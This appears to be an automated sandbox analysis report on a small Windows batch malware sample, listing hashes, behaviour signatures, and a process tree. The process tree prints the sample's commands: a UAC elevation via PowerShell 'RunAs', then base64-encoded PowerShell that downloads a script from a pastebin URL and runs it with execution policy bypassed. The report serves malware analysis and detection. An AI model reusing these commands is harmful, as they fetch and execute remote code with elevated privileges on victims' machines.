Overview

overview

10

Static

static

1

LHVWN_virus_src.bat

windows7-x64

5

LHVWN_virus_src.bat

windows10-2004-x64

10

Resubmissions

08-12-2024 23:35

241208-3k15zawkhx 10

08-12-2024 12:59

241208-p8a2ssypfk 10

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    08-12-2024 12:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LHVWN_virus_src.bat

  • Size

    680B

  • MD5

    28a24f08a62dc5c8af6be5e921d4c5ad

  • SHA1

    97f70c14a8e2ba4da9d8f5d65961d7d998ebb637

  • SHA256

    c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

  • SHA512

    e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Score
5/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

    execution
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2772
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2656

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    64216b493124fdf095225c6e9540f217

    SHA1

    d7ddd7665e52ba52dcfafd4d98607b81a4bdb2f0

    SHA256

    2790c9b24dd563cd8009a9feacd6856e68de4963564b93012b396e8ac3a97916

    SHA512

    ffa5c4f3b8594932c093113f58eb8f78501d05a028113cfb63b2a0e8d6821d1255d833dbd6ba5e15a3bc0d35be6c899d8adf02d11d2ffe9985a9616190e1d5b6

    Download Submit

  • memory/936-4-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/936-5-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/936-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/936-7-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/936-8-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/936-9-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/936-10-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/936-11-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2756-22-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2756-23-0x0000000001F70000-0x0000000001F78000-memory.dmp

    Filesize

    32KB

    Download